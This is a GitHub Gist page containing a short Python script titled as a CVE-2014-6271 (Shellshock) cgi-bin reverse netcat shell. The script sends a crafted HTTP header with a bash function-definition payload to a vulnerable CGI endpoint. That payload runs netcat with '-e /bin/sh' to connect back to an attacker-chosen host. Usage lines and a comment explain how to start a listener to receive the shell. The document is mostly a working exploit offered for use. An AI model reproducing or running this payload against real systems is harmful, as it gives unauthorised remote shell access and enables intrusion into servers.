Skip to content

Instantly share code, notes, and snippets.

@schniggie
Created September 25, 2014 08:19
Show Gist options
  • Save schniggie/5eeeb8ac943b5c2bb356 to your computer and use it in GitHub Desktop.
Save schniggie/5eeeb8ac943b5c2bb356 to your computer and use it in GitHub Desktop.
CVE-2014-6271 cgi-bin reverse netcat shell
#
#CVE-2014-6271 cgi-bin reverse shell
#Use netcat -l -p 8080 to receive the reverse shell
#
import httplib,urllib,sys
if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi '10.0.0.1 8080'" % sys.argv[0]
exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/netcat -e /bin/sh %s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment